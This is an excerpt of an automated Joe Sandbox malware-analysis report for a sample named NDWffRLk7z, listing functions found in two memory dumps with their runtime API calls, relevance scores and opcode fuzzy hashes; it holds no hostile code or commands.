Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 1687795959-3154422776
Opcode ID: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
Instruction ID: 78896325b6b5d70010e1ee9e49f38da00e370817edf74f3b448257e365f7b275
Opcode Fuzzy Hash: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
Instruction Fuzzy Hash: 99E08630900608F6CB14EE56D80EBDD77A45B51749F61C1277819610929BBC96C8CB4E

Function 02145AEF Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 02145B7A
__alldvrm.LIBCMT ref: 02145D7B
__alldvrm.LIBCMT ref: 02145D9D

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction ID: 1ae21ceaf3d7bf42fa717fec5a8a0506651ae41658680a312d18ae43fca4757d
Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction Fuzzy Hash: 97A16A7298038ABFD726CF18C8907AEBBE7EF65310F5441ADD99D9B281CB358941CB50

Function 00435888 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00435913
__alldvrm.LIBCMT ref: 00435B14
__alldvrm.LIBCMT ref: 00435B36

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction ID: bca4f3389f7aef3b321b47e138c454c1308b116cb1c02f017d73c82a305e3271
Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction Fuzzy Hash: 65A14872A00B869FEB15DE18C8917AEFBE1EF19310F28426FD5859B381C23C9D41C759

Function 0214FC5F Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0214FD8E

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction ID: 883d7df7bd3ea207ae1bbeaef79c096508b19f69fcb7eb5ddef8513548a271c4
Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction Fuzzy Hash: E8412A31AC06046FDB256FB99C44BAE3BA6EF05770F140625F52CD7790DF3649428AA2

Function 0043F9F8 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043FB27

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction ID: f2494f1ef04ef44517cd1171a85dede66e5513e309315ffa42068036143921cc
Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction Fuzzy Hash: 57410771E00210ABDB257BBADC42AAF7664EF5E374F14127FF41882391D73C590946A9

Function 02146AF4 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0214046A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 02146B41
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02146BCA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02146BDC
__freea.LIBCMT ref: 02146BE5

Part of subcall function 021438FE: RtlAllocateHeap.NTDLL(00000000,0211DACD,00000000), ref: 02143930

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
Instruction ID: 90752668a04c8bac21973a86d1aaf7a4fd2882ebb8a03c1106c44ac7446a3ca4
Opcode Fuzzy Hash: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
Instruction Fuzzy Hash: F531CF72A4025AAFDF25CF64CC84DAE7BA9EF41718F154269EC08D7190EB35D950CB90

Function 0211D648 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0211D6A0
__Xtime_diff_to_millis2.LIBCPMT ref: 0211D6BA
_xtime_get.LIBCPMT ref: 0211D6DD
__Xtime_diff_to_millis2.LIBCPMT ref: 0211D6E9

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction ID: a974eac4ad3e9c189417a7e53bad97fafd9bad341ecee5c15c951fc9caee0d52
Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction Fuzzy Hash: 34215CB5E40619AFDF04EFA4EC819BEB7B9EF09710F100069E905A7250DB74AD028FA1

Function 0040D3E1 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0040D439
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D453
_xtime_get.LIBCPMT ref: 0040D476
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D482

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
Instruction ID: d103751f5e86bb577f21b0ef41fc0747bac1fbbf4bb65c452d8b20089be38efe
Opcode Fuzzy Hash: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
Instruction Fuzzy Hash: A7217C75E0021A9FDF00EFA5CC829AEB7B8EF09714F10007AF901B7291D778AD058BA5

Function 004236DF Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000), ref: 00423729
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423711

Part of subcall function 0041B71C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B73D

__CxxThrowException@8.LIBVCRUNTIME ref: 0042375A
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423783

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
String ID:
API String ID: 2630251706-0
Opcode ID: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
Instruction ID: fbbc1a7e5a16338d661a11365c58371bffdd4c48ac4c368ddaba424d9e7313e5
Opcode Fuzzy Hash: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
Instruction Fuzzy Hash: 5911E9747002146BCF04AF659C85DAEB765EB84761B144067FA059B392CBAC9D41C698

Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000005), ref: 00401FA5
UpdateWindow.USER32 ref: 00401FAD
ShowWindow.USER32(00000000), ref: 00401FC1
MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 00402024

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Window$Show$MoveUpdate
String ID:
API String ID: 1339878773-0
Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction ID: 53ee9dd5e88c5c6849e3e7895ae91ae42f7fd804de43801a61d80981d891571f
Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction Fuzzy Hash: 90016531E006109BC7258F19ED04A267BA7FFD5712B15803AF40C972B1D7B1AC428B9C

Function 02139320 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0213933A

Part of subcall function 02139287: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 021392B6
Part of subcall function 02139287: ___AdjustPointer.LIBCMT ref: 021392D1

_UnwindNestedFrames.LIBCMT ref: 0213934F
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02139360
CallCatchBlock.LIBVCRUNTIME ref: 02139388

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: d93cb8bbcf973c392287d3cce23a12043eef4945e5ad07889f3b4400b3035aad
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: CB0113B2140149BFCF126EA5CC44EEB3F6BEF88754F054008FE48A6120C372E861ABA0

Function 004290B9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004290D3

Part of subcall function 00429020: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042904F
Part of subcall function 00429020: ___AdjustPointer.LIBCMT ref: 0042906A

_UnwindNestedFrames.LIBCMT ref: 004290E8
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 004290F9
CallCatchBlock.LIBVCRUNTIME ref: 00429121

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 9a28eba3c49a40873050ba514f30250a61a7a586528b59ff06f814ea835fedb3
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 55014032200159BBDF116E96EC41EEB7F7AEF48758F444009FE4896121C73AEC61DBA8

Function 02145186 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0214512D,00000000,00000000,00000000,00000000,?,021453E5,00000006,0044A378), ref: 021451B8
GetLastError.KERNEL32(?,0214512D,00000000,00000000,00000000,00000000,?,021453E5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,02142203), ref: 021451C4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0214512D,00000000,00000000,00000000,00000000,?,021453E5,00000006,0044A378,0044A370,0044A378,00000000), ref: 021451D2

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 4df520db7c9889a1c9cec7a020555e5442f92aefbb90d9ee7fb67b135602f120
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: AE012B36691223BBC7214F799C44E577799BF26FA27610630F90ED7140CF20D901CAE4

Function 00434F1F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue), ref: 00434F51
GetLastError.KERNEL32(?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431F9C), ref: 00434F5D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F6B

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 0dde809cff85efe1a06f082dffa05588a2f4c4b6f5b2494ffdd5bda6add1d188
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 3401FC36615322AFC7214F69AC449A77B98AF89FA1F241531F905D7240D724E90186E8

Function 02136385 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 0213639F
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 021363B3
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 021363CB
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021363E3

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: 856505b4f124e7591410dd4e35314703204fa6ac699b8a3d03845d1bc01db347
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 9401F232680124BBDF17AE599840AAF779F9B95350F010015EC29AB281DB70ED148AA4

Function 02132B72 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02132BA1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02132BBF

Part of subcall function 02128677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 02128698
Part of subcall function 02128677: Hash.LIBCMT ref: 021286D8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02132BC8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02132BE8

Part of subcall function 0212F6CF: Hash.LIBCMT ref: 0212F6E1

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction ID: fef3ee6d4e32bc0def0d33df3e4174eca7486f1006c0ffc1efa346cc2d3222c9
Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction Fuzzy Hash: F4115E76400604AFC715EFA5C881EDAF7BAFF19310F004A5EE95687551EB70E914CBA0

Function 0042611E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426138
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042614C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426164
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042617C

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: ba6f451568feed0ad97d4c35bc03da7052fef1102373e57c37541bd94dea7e10
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: DD01F236700224A7CF16AE5AA811AFFB7A99F80354F41005BFC11A7282DE24FD2192A8

Function 02132B81 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02132BA1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02132BBF

Part of subcall function 02128677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 02128698
Part of subcall function 02128677: Hash.LIBCMT ref: 021286D8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02132BC8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02132BE8

Part of subcall function 0212F6CF: Hash.LIBCMT ref: 0212F6E1

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction ID: 1810390c0ca87d3c20cd9b284384bf0a1b45245512d12b48ebf16b9e49851f22
Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction Fuzzy Hash: E8010576400604AFC725EFA5C881EDAB7AAAF58310B008A1EA55687550DB70F9548BA0

Function 021150C0 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 021150C7

Part of subcall function 0211BDA4: __EH_prolog3_GS.LIBCMT ref: 0211BDAB

std::_Locinfo::_Locinfo.LIBCPMT ref: 02115112
__Getcoll.LIBCPMT ref: 02115121
std::_Locinfo::~_Locinfo.LIBCPMT ref: 02115131

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
Instruction ID: 3f851a8bd39b0eb527bcc066cba13c9e541a8e88545b449b180e5d7bf717c2fe
Opcode Fuzzy Hash: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
Instruction Fuzzy Hash: 5A019E31980308EFDB04EFA4D450BDDB7B2BF84721F10813AD045AB241CB759544CF92

Function 02115B7C Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 02115B83

Part of subcall function 0211BDA4: __EH_prolog3_GS.LIBCMT ref: 0211BDAB

std::_Locinfo::_Locinfo.LIBCPMT ref: 02115BCE
__Getcoll.LIBCPMT ref: 02115BDD
std::_Locinfo::~_Locinfo.LIBCPMT ref: 02115BED

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
Instruction ID: 76445cb9a05a37d89882a07902c4b43ab9b7527a13aac587c100623fc420d365
Opcode Fuzzy Hash: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
Instruction Fuzzy Hash: E5014C71990309EFDB14EFA4D440B9DB7B2BF54715F10803AD445AB240CBB59545CF96

Function 00405915 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040591C

Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44

std::_Locinfo::_Locinfo.LIBCPMT ref: 00405967
__Getcoll.LIBCPMT ref: 00405976
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405986

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
Instruction ID: 7de8e0425e838f52bf763386e227ca4e4c8dd97e461cbe55c35c0d0d082d521b
Opcode Fuzzy Hash: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
Instruction Fuzzy Hash: 61011771910209DFDB10EFA5C486B9DB7B0EF04329F10843EE459BB681DB789549CF99

Function 0212C12E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0212C160
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0212C170
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0212C180
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0212C194

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: ef8d936870d34ea167955d1ef5d8e630f8d5e3b54aec7abed779b370229d2eb5
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: CF01FB7A084179FBCF129F54DC028AE3B26AF55354F068523FA2884030D332C678EBD1

Function 0041BEC7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BEF9
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF2D

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: 54cf5004022dc03f320fac5c152f4f5b0e5638c7bf5de93af177e0e0418c077f
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 1901FB3744418DBBDF119E64DD428EE3B66EF08354B148516F918C4235C336CAB2EF89

Function 02123763 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0212377C

Part of subcall function 02122B06: ___crtGetTimeFormatEx.LIBCMT ref: 02122B1C
Part of subcall function 02122B06: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02122B3B

GetLastError.KERNEL32 ref: 02123798
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021237AE
__CxxThrowException@8.LIBVCRUNTIME ref: 021237BC

Part of subcall function 021228DC: SetThreadPriority.KERNEL32(?,?), ref: 021228E8

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
Instruction ID: 90b128b6445eaafc084c7a481e4343605fc30a30e4830fe8390cc5573156d6e0
Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
Instruction Fuzzy Hash: 57F0A7B25803353DE720B7755C0AFBF369C9B01750F500966B915E7080EBA9D4188AB4

Function 0211D47C Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02121332

Part of subcall function 02120BA4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02120BC6
Part of subcall function 02120BA4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02120BE7

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02121345
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02121351
